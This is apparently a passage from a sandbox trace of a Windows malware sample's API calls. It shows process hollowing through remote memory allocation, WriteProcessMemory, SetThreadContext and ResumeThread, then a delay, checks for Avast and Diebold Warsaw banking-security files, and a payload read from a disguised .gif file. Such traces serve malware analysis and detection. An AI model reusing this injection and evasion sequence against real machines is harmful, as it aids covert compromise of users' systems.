[177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0157.466] ReadProcessMemory (in: hProcess=0x11c, lpBaseAddress=0x7ffd6008, lpBuffer=0x580c74, nSize=0x4, lpNumberOfBytesRead=0x580c7c | out: lpBuffer=0x580c74*, lpNumberOfBytesRead=0x580c7c*=0x4) returned 1
[0157.466] VirtualAllocEx (hProcess=0x11c, lpAddress=0x400000, dwSize=0x63000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0157.466] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x1a90000
[0157.466] VirtualAlloc (lpAddress=0x1a90000, dwSize=0x18000, flAllocationType=0x1000, flProtect=0x4) returned 0x1a90000
[0157.467] VirtualAlloc (lpAddress=0x1a44000, dwSize=0x4c000, flAllocationType=0x1000, flProtect=0x4) returned 0x1a44000
[0157.475] WriteProcessMemory (in: hProcess=0x11c, lpBaseAddress=0x400000, lpBuffer=0x1a43158*, nSize=0x63000, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x1a43158*, lpNumberOfBytesWritten=0x580c7c*=0x63000) returned 1
[0157.489] WriteProcessMemory (in: hProcess=0x11c, lpBaseAddress=0x7ffd6008, lpBuffer=0x580c78*, nSize=0x4, lpNumberOfBytesWritten=0x580c7c | out: lpBuffer=0x580c78*, lpNumberOfBytesWritten=0x580c7c*=0x4) returned 1
[0157.490] SetThreadContext (hThread=0x120, lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd6000, Edx=0x0, Ecx=0x0, Eax=0x450cb8, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x24f9e8, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0157.490] ResumeThread (hThread=0x120) returned 0x1
[0157.490] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0157.491] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0157.491] GlobalUnlock (hMem=0x95000c) returned 0
[0157.491] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0157.491] GlobalUnlock (hMem=0x950004) returned 0
[0157.499] Sleep (dwMilliseconds=0xe74e)
[0167.506] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0167.506] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0167.506] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0167.507] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0167.507] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128
[0167.507] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0167.507] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0167.507] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0167.507] SetFilePointer (in: hFile=0x128, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0167.509] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0167.509] ReadFile (in: hFile=0x128, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0167.516] CloseHandle (hObject=0x128) returned 1
[0167.516] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.517] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.517] GlobalUnlock (hMem=0x95000c) returned 0
[0167.517] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0167.517] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.518] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.518] GlobalUnlock (hMem=0x95000c) returned 0
[0167.518] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0167.519] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0167.520] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0167.520] GlobalUnlock (hMem=0x95000c) returned 0
[0167.520] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0167.520] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0167.521] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0167.521] GlobalUnlock (hMem=0x95000c) returned 0
[0167.521] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0167.521] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0167.522] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0167.522] GlobalUnlock (hMem=0x95000c) returned 0
[0167.522] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0167.523] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0167.524] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0167.524] GlobalUnlock (hMem=0x95000c) returned 0
[0167.524] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0167.525] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.525] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.525] GlobalUnlock (hMem=0x95000c) returned 0
[0167.525] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0167.526] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.527] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.527] GlobalUnlock (hMem=0x95000c) returned 0
[0167.527] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0167.527] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.528] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.528] GlobalUnlock (hMem=0x95000c) returned 0
[0167.528] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0167.528] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.529] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.529] GlobalUnlock (hMem=0x95000c) returned 0
[0167.529] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0167.529] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.530] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.530] GlobalUnlock (hMem=0x95000c) returned 0
[0167.530] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0167.530] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.531] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.531] GlobalUnlock (hMem=0x95000c) returned 0
[0167.531] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0167.531] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.532] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.532] GlobalUnlock (hMem=0x95000c) returned 0
[0167.532] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0167.532] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.533] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.533] GlobalUnlock (hMem=0x95000c) returned 0
[0167.533] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0167.533] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.534] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.534] GlobalUnlock (hMem=0x95000c) returned 0
[0167.534] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0167.534] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.535] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.535] GlobalUnlock (hMem=0x95000c) returned 0
[0167.535] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0167.536] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0167.537] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0167.537] GlobalUnlock (hMem=0x95000c) returned 0
[0167.537] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0167.537] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0167.538] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0167.538] GlobalUnlock (hMem=0x95000c) returned 0
[0167.538] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0167.540] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0167.541] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0167.541] GlobalUnlock (hMem=0x95000c) returned 0
[0167.541] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0167.541] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.542] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.542] GlobalUnlock (hMem=0x95000c) returned 0
[0167.542] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0167.542] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.543] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.543] GlobalUnlock (hMem=0x95000c) returned 0
[0167.543] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0167.543] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.544] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.544] GlobalUnlock (hMem=0x95000c) returned 0
[0167.544] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0167.544] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.545] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.545] GlobalUnlock (hMem=0x95000c) returned 0
[0167.545] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0167.545] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.546] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.546] GlobalUnlock (hMem=0x95000c) returned 0
[0167.546] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0167.546] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.547] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.547] GlobalUnlock (hMem=0x95000c) returned 0
[0167.547] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0167.547] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.548] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.548] GlobalUnlock (hMem=0x95000c) returned 0
[0167.548] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0167.548] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.549] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.549] GlobalUnlock (hMem=0x95000c) returned 0
[0167.549] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0167.549] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.549] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.550] GlobalUnlock (hMem=0x95000c) returned 0
[0167.550] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0167.550] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.550] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.550] GlobalUnlock (hMem=0x95000c) returned 0
[0167.550] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0167.550] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.551] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.551] GlobalUnlock (hMem=0x95000c) returned 0
[0167.551] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0167.551] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.552] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.552] GlobalUnlock (hMem=0x95000c) returned 0
[0167.552] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0167.552] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.553] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.553] GlobalUnlock (hMem=0x95000c) returned 0
[0167.553] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0167.553] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0167.554] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0167.554] GlobalUnlock (hMem=0x95000c) returned 0
[0167.554] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
